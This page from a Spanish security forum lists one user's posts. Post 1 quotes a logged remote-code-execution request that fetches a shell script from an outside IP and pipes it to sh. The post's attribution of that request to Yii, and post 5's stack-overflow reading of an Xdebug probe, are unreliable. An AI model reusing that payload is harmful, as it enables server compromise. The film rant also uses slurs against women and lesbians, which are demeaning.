elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Temas
Páginas: [1] 2 3
1  Seguridad Informática / Seguridad / Peticiones al servidor usando Yii PHP Framework en: 13 Marzo 2021, 19:38 pm
Últimamente me están lanzando al servidor web, bastantes peticiones del tipo:

Código:
Requested GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://31.210.20.181/ldr.sh|sh

Una rápida búsqueda en google, me dice que pueden ser originadas por alguna de las herramientas de Yii PHP framework

el código de la petición entiendo que es básicamente que descargue un script y lo ejecute.

a ver si alguien tiene mas conocimientos sobre el tema
2  Informática / Software / Error Chrome-error://chromewebdata/# en navegador Brave en: 2 Julio 2020, 19:41 pm
Bueno para el que no lo conozca Brave Browser es sucedáneo de Chrome coloquialmente hablando.

La realidad es que es un navegador en base a chromium al que se le pueden configurar una serie de opciones de privacidad y bloqueo de anuncios de manera sencilla.

Pero recientemente me he encontrado con este error.

Cuando visitamos una pagina que considera no segura, te muestra un warning, hasta ahí todo normal, cuando damos a detalles o a configuración avanzada dependiendo del error nos pone proceder al sitio o visitar este sitio inseguro, pues clickamos y no pasamos de ahí, mientras que abajo a la izquierda pone Chrome-error://chromewebdata/#



Bien según he leído en la comunidad brave se trata de un error de traducción.

Por tanto, hasta que lo arreglen con una actualización, la única manera de solucionar este fastidioso bug es configurar el navegador en su idioma original.

Espero que os sirva, un saludo ;)
3  Foros Generales / Foro Libre / La gran decepción de Los Vengadores Endgame (spoiler total) en: 21 Agosto 2019, 14:51 pm
No suelo abrir temas en el offtopic, pero esto es que clama al cielo.

Que decepción me he llevado al ver Los Vengadores Endgame, normalmente no escribo cosas así en el foro, pero tengo que sobrellevar el sock que me ha producido el ver esta película.



Vamos como es habitual a poner en contexto el asunto, no soy lector de comics, por lo que no tengo prejuicios puristas de las adaptaciones de los comics al cine que ha hecho Marvel, en cambio si he visto las 22 películas que hasta hoy componen la saga, incluso el bodrio de Pantera Negra, tampoco había visto trailers o comentarios, así que el otro día en casa, en la soledad y oscuridad del salón me puse a ver Los Vengadores Infinity War (error) y acto seguido Los Vengadores Endgame.

Al igual que en la película de Clint Eastwood, Cometieron dos errores, primer error colgar a un inocente, y segundo error, no terminar el trabajo, yo cometí mis dos errores, ver Infinity War primero, un peliculón como la copa de un pino, que aunque tiene cosas para sacarle punta a la película, como lo gay que se vuelve visión si lo comparamos con el visión de la era de ultron, se le perdona cualquier error a este pedazo de película, segundo error, terminar de ver Endgame, ahí perdí toda mi inocencia, esperanzas, sueños e ilusiones. Solo me consuela el hecho que no pagué la entrada de un cine para ver este fiasco que es esta peli de los vengadores Endgame.

Una vez que he puesto al lector en contexto, vamos a desgranar esta gran decepción de película, para lo cual seguiremos la línea argumental de la película, que se resume un poco en que los supervivientes localizan y matan thanos, pasan 5 años aparece AntMan, regresan al pasado a distintos años y lugares y consiguen las gemas del infinito, chasquean los dedos y todo el mundo que se había cargado Thanos en Infinity War revive, como se les cuela un Thanos del pasado por la máquina del tiempo, se produce una gran batalla, donde nos meten de lleno el movimiento feminista #Metoo y el sacrificio final de Iron Man para salvar la situación.

Empezamos a desgranar el film, todo se inicia con el rescate de Iron man y nebula por la capitana marvel, se juntan todos los supervivientes que son el capitán america, Iron Man, hulk, la viuda negra, war machine (cor Rogers), rocket, nebula, thor y la capitana marvel; localizan a Thanos y para sorpresa de todo el mundo resulta que ha destruido las gemas, incluida la gema verde, la del tiempo, y thor se mosquea y le corta la cabeza con el “destructor de tormentas”. Ahí tenía que haber dejado de ver la película, era mas de infinity War, y un giro sorprendente de la trama, pero claro ¿y ahora que no está la gema del tiempo que?



Yo no sé si el fallecimiento de Stan Lee afectó a los hermanos Russo, o que cambiaron de camello, porque todo lo que vino después, fue una cagada tras otra.

Pues la trama continua con un “5 años después”, ese 5 años después no es vanal, afecta mucho y mal a parte los personajes, capi, war machine, rocket, nebula, y Iron man siguen mas o menos en su línea, pero la viuda negra se humaniza, dentro de lo malo tolerable, pero lo de thor, es increíble, no por el cambio físico, que lo presentan gordo y dejado, sino por el carácter, pasa de ser un dios a un blandengue llorón, y todo porque le ha afectado que hayan eliminado a la mitad del universo cuando a él, ni le va ni le viene el tema, cascó su padre Odín, cascó su madre, cascó su hermano, cascaron sus amigos, cascó su pueblo, cascó su planeta, y ahí estuvo thor el dios del trueno, cascan unos desconocidos que no tienen ninguna relación con él y resulta que se viene abajo, totalmente absurdo y fuera de lugar; los hermanos Russo puestos hasta el culo de sustancias psicotrópicas de mala calidad, hacen de thor el pelele y el graciosillo de la película. Ahora lo que no tiene perdón de dios, es lo que hacen con hulk, resulta que combinan el cuerpo de hulk y la personalidad de baner, haciendo un “porfesor” hulk, ni un puñetazo en toda la película, ni en la batalla final se le ve en acción, por dios, hulk es hulk. Yo creo que en el montaje se dieron cuenta que la habían cagado pero bien como demuestra esta secuencia.



La capitana marvel se hace un cambio de look a lo lesbiana dominante, pero desde el primer momento la presentan en esta película como una borde con la regla y un palo metido en el culo, nada que ver al carácter de su película “capitana marvel” supongo que a exigencias del #Metoo y el colectivo de lesbianas feminazis.

Después del destrozo de personajes hecho con el “5 años después” hay que retomar la línea argumental, Antman sale del mundo cuántico, y tiene la idea de viajar en el tiempo aprovechando ese mundo cuántico, bien, como alternativa a la gema del tiempo está bien, ahora es cuando la cagan, y se nos ponen a emparanollar con escenas de explicación del viaje en el tiempo, donde nos quieren vender su idea espaciotemporal criticando la idea de tiempo lineal como en regreso al futuro, mientras nos venden la multirealidad, vamos una fumada que no entienden todavía ni ellos.

Según y tomando la explicación de la anciana (la de doctor strange) que le hace a baner de la multirealidad, el alterar una realidad para ayudar a su realidad jode la realidad alterada, pues bien, con un par, dicho esto, los hermanos Russo con el subidon del chute, deciden hacer lo que les da la gana, y luego todo queda perdonado porque las gemas las devuelven al momento exacto de donde las cogieron. Pues señores mios, hay una realidad jodida y no resuelta cuando loki se va con el teseracto, otra cuando thor con un par se lleva el martillo de la realidad a la que van, ahora vuélvanse a ver la película thor el mundo oscuro, e imagínense toda la película a thor sin el martillo. Y sin contar otra tercera realidad jodida cuando thanos se va de su realidad por la máquina del tiempo, y lo mejor de todo esto que es para darles unas yoyas bien dadas a los hermanos Russo, si dices que el tiempo no es lineal a lo regreso al futuro, en el final no puedes mandar al pasado al capitán América y traerlo viejecete en la misma realidad porque eso es un concepto de tiempo lineal. En resumen un cacacao que montan que es infumable, lo mires por donde lo mires.

Ahora vamos al momento más tonto y más determinante de toda la película, resulta que cuando van a por la gema del poder war machine y nébula, la nébula del futuro se sincroniza con la nebula de esa época y thanos se entera de todo, bien pues resulta que consiguen la gema de poder, war machine le da al botón para volver al futuro y vuelve, pero nebula en ese instante cortocircuita y se queda inmovilizada, cuando recupera el tipo se va a la nave e intenta avisar a ojo de halcón y a la viuda negra de que thanos sabe que están en su realidad, pues resulta que ve entrar la nave de thanos en el planeta y ve como la cogen en un rayo tractor, y en todo ese tiempo NO ES CAPAZ DE DAR AL BOTONCITO PARA VOLVER AL FUTURO. Argumento total fail, claro si da al botón no hay malo en toda la película, vaya cagadón.

Bueno después de este fallo garrafal en el trama, nos encontramos con el siguiente fallo argumental, el “profesor” hulk se pone el guante con las 6 gemas y desea que resucite todo el mundo, pero en este momento, osea habiendo pasado los 5 años, a ver guionistas, con haber ido justo al momento que thanos pierde la cabeza suficiente, me podéis decir que iron man quería conservar a su hija, pues no es escusa se le dice a baner que desee que todo el mundo resucite y que peper y Morgan y los presentes sean trasportados al día en que thanos pierde la cabeza y que los últimos 5 años no hayan ocurrido obviamente desapareciendo sus homónimos de esa realidad, para no juntarse con dos capitán america, pero claro como el tiempo de multirealidades no se lo creen ni ellos, pues ni piensan en esta fórmula, y luego el amigo gordito de peter Parker, está en el instituto igualito que hace 5 años, venga ya, amen de todas las vidas rotas por todo el universo que dejarían, matrimonios, gente que no encontrarían a sus seres queridos porque en esos 5 años la gente también muere, etc, etc. Vamos otro epic fail de la trama.

Como ya estaban metidos en la espiral de fallos agurmentales, y ya no podían salir, pues de perdidos al rio, nos presentamos en la batalla final, y nos encontramos un thanos del pasado que sin gemas pega unas ostias como panes y es más poderoso que en infinity war con gemas, que un capitán america coge el martillo de thor, lo cual no supone una novedad ya que en los vengadores la era de ultron casi lo coge pero eso de que también lanza rayos, cuando en la película “thor racknarog” thor descubre que el poder del rayo esta en él y no en el martillo, pues que queréis que os diga, seguimos, el capitán america con el martillo, thor con el destructor de tormentas e Iron man no tienen cojones a vencer a ese super thanos sin gemas del pasado. Bueno se produce la batalla de la leche donde intentan darle a cada personaje su minutito de gloria, ¿hulk? ¿Dónde está hulk? Pues eso, ni un manporro, missing. Con esto llegamos al momento #Metoo, o de enaltecimiento del feminacismo, pues deciden llevar el guantelete con las gemas a la furgoneta de antman para mandar las gemas al pasado, ahí veo otro fallo argumental, pero como no he entrado en las partículas pink antes, no voy a entrar ahora, pues nada, la capitana marvel, coge el guantelete y se rodea de todo el reparto femenino de escolta, lo que me da pena de esa escena es que también está la pobrecita mantis y no la veo que su fuerte sea el dar manporros precisamente. El resultado final de la secuencia es que thanos frustra el intento de todas las féminas, asi que sacamos la moraleja de que aunque se unan todas las mujeres no consiguen el objetivo, ya que es iron man quien resuelve la situación, creo que la escena hace un flaco favor al feminismo, tanto por haberla metido con calzador en la batalla provocando la aversión del espectador, que va a ver una película y no a que lo idieologicen y también porque se saca la moraleja de que las mujeres no pueden aunque se unan todas.

Bueno ese intento femdom frustrado da lugar a un combate entre thanos y la capitana marvel, que realmente no se cual es su poder, pero creo que se han pasado tres pueblos con él, porque se lleva una yoya con la gema del poder y sale de rositas.

youtube me bloquea el clip de video por derechos de autor, buscar la lucha capitana marvel-thanos

Recordemos que hace la gema de poder.



Si atendemos a esto, la capitana marvel tenia que haberse volatilizado al instante, creo sinceramente que los de marvel, se estan columpiando con este personaje

En definitiva, una película para olvidar, cagada tras cagada, trágico final de la saga, menos mal que Stan Lee esta muerto y no ha visto este bodrio. Hermanos Russo espero sinceramente que el karma os devuelva todo el mal que intencionadamente le habéis hecho en esta película
4  Media / Multimedia / Las televisiones samsung posteriores a 2018 no admiten el codec Xvid en: 1 Mayo 2019, 12:39 pm
Pues como expongo en el título, ojiplático me he quedado cuando me he comprado una tele, voy con mi pincho usb con los capítulos de la serie a la que estoy enganchado, y me dice que no puede leer el archivo y que el motivo es porque tiene codec Xvid y las teles samsung posteriores a 2018 no lo soportan.

a mi ni siquiera me da esta opción



en definitiva leyendo un poco, la gente esta que trina y con razón.

https://eu.community.samsung.com/t5/Televisi%C3%B3n/televisor-samsung-UE43NU7405-No-reproduce-peliculas-ni-series-en/td-p/701445/page/3

ahora mismo la única solución que he visto es convertir a otro formato los vídeos, pero dependiendo de que programas uses pierdes mas o menos calidad con la conversión.

yo ahora mismo estoy utilizando vlc para convertir los archivos a h264 + mp3 (mp4) manteniendo la pista de video/audio original.

apenas pierde calidad, y va bastante rápida la conversión, aunque algunos capítulos me han dado problema y los he tenido que convertir a mano con ffmpeg

En definitiva, avisados estáis de como se las gastan últimamente los coreanos de samsumg

5  Programación / Desarrollo Web / Desbordamiento de pila en servidor web en: 23 Marzo 2019, 09:47 am
Buenas

a dia de hoy he recibido desde ip,s rusas dos peticiones
Código:
Requested GET /?XDEBUG_SESSION_START=phpstorm


he estado leyendo que son para hacer un desbordamiento de pila y ganar acceso a una sesion.

Alguien me puede ampliar información sobre esto.

si por ejemplo, la sesión que se abre es para navegar por los directorios del servidor, o si por el contrario gana control total de la maquina.

thanx
6  Foros Generales / Foro Libre / Mi ISP ya no se corta ni un pelo, y te pide abiertamente que te pueda espiar en: 19 Febrero 2019, 21:06 pm
Siempre he mantenido y mantengo que todos los ISP espían a sus usuarios analizando su trafico, donde se conectan, e incluso correlacionan datos personales con la navegación.

Llevaba tiempo sin entrar en mi área de cliente, y según entro me topo con esto.


vamos que ya no se cortan un pelo, y para darse cobertura legal te dicen que aceptes estas condiciones, y seguro que habrá muchos taraos que le habrán dado al botón de aceptar.

en fin, aunque yo no haya dado a aceptar, me seguirán espiando igualmente, vulnerando flagrantemente mis derechos, pero como no puedo demostrarlo porque habría que incautar un nodo, pues a j.oderse toca.

vaya mi.erda de país que tenemos, se estarán forrando los políticos con sobres, mirando para otro lado, mientras las principales teleoperadoras  abusan y espían a sus clientes, por lo menos tenian que tener la decencia de quitar la secretaria de estado de telecomunicaciones, porque para lo que hacen...   :¬¬
7  Informática / Software / La caida en desgracia de Teamviewer en: 14 Febrero 2019, 11:11 am
Como si de la historia del Imperio Romano se tratara, en el artículo de hoy vamos a tratar de entender que está pasando con Teamviewer.

Para el que no esté familiarizado con Teamviewer, es una herramienta que te permite controlar remotamente un PC. Según la política de los creadores de la aplicación, esta herramienta es de uso gratuito para uso particular, debiendo comprar una licencia para su uso de manera empresarial/comercial.

Llevo unos años usando Teamviewer para administrar mi pequeño servidor web, en el cual si habeis visitado mi página web, habreis podido observar que no tengo publicidad y que es una simple web de entretenimiento. Por lo que siempre he cumplido con las políticas de los desarrolladores de la herramienta.

Lo que tengo claro, es que nunca recomendaría para uso empresarial una herramienta como Teamviwer, o cualquiera similar perteneciente a terceros, es un fallo de seguridad garrafal, pero hay gente para todo, supongo que ese es el negocio de Teamviewer. Lo normal en una empresa es administrar los equipos por ssh, o si quieres un entorno de escritorio puedes usar vnc, punto a punto sin pasar por servidores de terceros.

Una vez hecha la introducción, entremos en materia, durante el tiempo que he estado usando esta herramienta, en algunas ocasiones me salía un mensajito cuando iniciaba Teamviewer que ponía que se había detectado un posible uso comercial, obviamente lo cual no es cierto, pero no pasaba de ahí, pero ayer empezó a cortarme la conexión cada dos minutos, entonces ¿Qué pasa con Teamviewer? Para responder a esta pregunta, me fui a preguntárselo a Google, y descubrí para mi asombro que desde el 2016 había entradas en este sentido, leyendo una de las entradas, me enteré de que por lo visto hubo una escisión de parte del equipo original de Teamviewer, las comunidades cuando hay pasta de por medio es lo que tiene, y parece ser que el equipo que se quedó a cargo de la aplicación, sobre el papel y de cara a la comunidad no cambió sus políticas de uso, pero la realidad es que quiere que pases por caja y pagues, recurriendo a tretas como la desconexión cada dos minutos de la sesión.

He visto que hay maneras de “resetear” estas limitaciones, que si un crack, que si desinstalando y volviendo a instalar previo cambio de mac, etc. Pero me niego a recurrir a esto cada x tiempo, por la avaricia desmesurada de los que gestionan a día de hoy esta herramienta.

Si Teamviewer esta donde esta, es por la comunidad, dado que siempre hemos puesto esta herramienta de ejemplo, de cómo se puede ganar dinero y además ser gratuita para el común de los mortales. Así se ha extendido y popularizado su uso, pero al igual que le pasó al Imperio Romano los más grandes también caen por una mala gestión.

Ahora, intrigado por saber más sobre la escisión en el equipo de Teamviewer, me topé con que estos miembros que se había separado habían montado una aplicación similar que se llama Anydesk, con las condiciones originarias de Teamviewer. Pues que he hecho, desinstalar Teamviewer de mi servidor y pasarme a Anydesk, que como prácticamente es más de lo mismo, en 2 minutos ya la tenía instalada, configurada y funcionando.


Que Teamviewer gestionado por estos usureros descanse en paz, y a su vez le deseo larga y prospera vida a Anydesk.

fuente yo  ;D

8  Media / Juegos y Consolas / PcGames-Download.net ha cerrado el 31-12-18 en: 23 Enero 2019, 19:42 pm
Pues eso, vaya chasco hoy he ido a ver que habia y me he encontrado que la url no existe.

investigando un poco, por lo visto el que la mantenia ha decidido cerrarla.



Una pena, me descargaba de ahí los juegos que me llamaban un poco la atención, aunque últimamente no haya mucho que se adapte a mi gusto, ya que todo esta enfocado al online y a cinemáticas increíbles y a comerse poco la cabeza y aporrear mucho los botones.

El último buen sabor de boca me lo lleve con HORIZON ZERO DAWN, ya que la secuela de Pillars of eternity me decepcionó un poco. (la primera parte para mi es un juegazo)

Pues nada, de momento me queda gamestorrent. Si alguien sabe alguna pagina que este bien en este sentido que no deje de compartirla.
9  Informática / Software / Google Chrome version 69 no funciona en windows 10 ver 1803 en: 12 Septiembre 2018, 15:48 pm
Bueno, hoy estaba aburrido y me ha dado por formatear el pc de casa. Lo hago un par de veces al año, me gusta tanto por hobby como por limpieza y para la actualización de algunas aplicaciones.

El caso es que con la instalacion limpita de windows 10 april update, vamos lo que viene siendo la version 1803, pues resulta que instalo chrome, y se me instala la version 69, en el resto de pc,s que tengo, todavia tengo la 68, incluso alguno la 67

Pues el caso es, que lo primero que te encuentras es que han modificado la interface grafica. Tampoco es un cambio de la leche, pero se nota bastante.


pero esa no es la cuestion, resulta que no puedo navegar, jajajajaja, si, un navegador que no navega por internet.


con edge navego sin problemas, con firefox portable sin problemas pero con chrome, "ERR CONNECTION TIMED OUT"


En definitiva, o el error esta en la nueva version de google chrome, o el sistema operativo no se me ha instalado bien.


a ver si alguien funciona con la version 69 chrome y me cuenta que tal le va.

10  Programación / Desarrollo Web / [Aporte] Instalar certificado ssl gratuito con Let's encrypt por culpa de chrome en: 7 Agosto 2018, 20:45 pm
El navegador Google Chrome identificará como "no seguros" todos los sitios web que utilicen el protocolo de transferencia HTTP a partir de julio de este año 2018, y admitirá solamente aquellas páginas que utilicen el sistema cifrado HTTPS. El bloqueo de páginas HTTP entrará en vigor con la difusión de la nueva versión del navegador de Google, Chrome 68, cuyo lanzamiento está previsto para el mes de julio de 2018.

Así que si te sale esta pantallita pues te han jodido, porque el que no tenga experiencia al respecto pensará que está en un sitio con contenido malicioso.


Así que teniendo en cuenta que Chrome es usado por casi el 60% de los usuarios, pues los chicos de Google me han obligado a actualizarme, para que luego digan que no están en posición de monopolio.


Entonces el que tiene una sencilla web que tiene que hacer, pues existe una opción buena, bonita y barata, más bien a coste cero.

Esta opción se llama Let’s encrypt donde si tu servidor web es de la familia unix es relativamente fácil solicitar un certificado ssl para tu dominio, sin datos bancarios, sin nombres, sin dni.

Cuando digo que es relativamente fácil, es porque el soporte mayoritario es para debian y si no te mueves en este entorno, pues te tienes que liar a instalar un montón de dependencias para conseguir hacer funcionar la herramienta certbot.

Mi solución ha sido sencilla, para no liarme ha instalar dependencias, he arrancado una live debian, he añadido la fuente al sources.list

Código:
deb-src http://ftp.debian.org/debian jessie-backports main

Y he actualizado la Live

Código:
apt-get update && apt-get upgrade -y

Una vez actualizado, he montado mi servidor web sobre debian ya que no utilizo los típicos servidores web como apache, y he instalado certbot.

Código:
apt-get install certbot

Después lo ejecutas

Código:
certbot certonly --webroot -w /var/www/html -d laurldetudominio

Si tienes subdominios pues los añades después de la url de tu web siempre precedidos de -d

Aceptas los términos, introduces un correo para notificaciones y te crea el certificado que tiene una validez de 90 días.

Es fácil automatizar el proceso con un simple script para que cada x días te renueve el certificado, pero en mi caso al estar en una live y debian no ser mi unix de cabecera pues con un simple Snapshot de vmware suficiente.

fuente yo  ;)
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines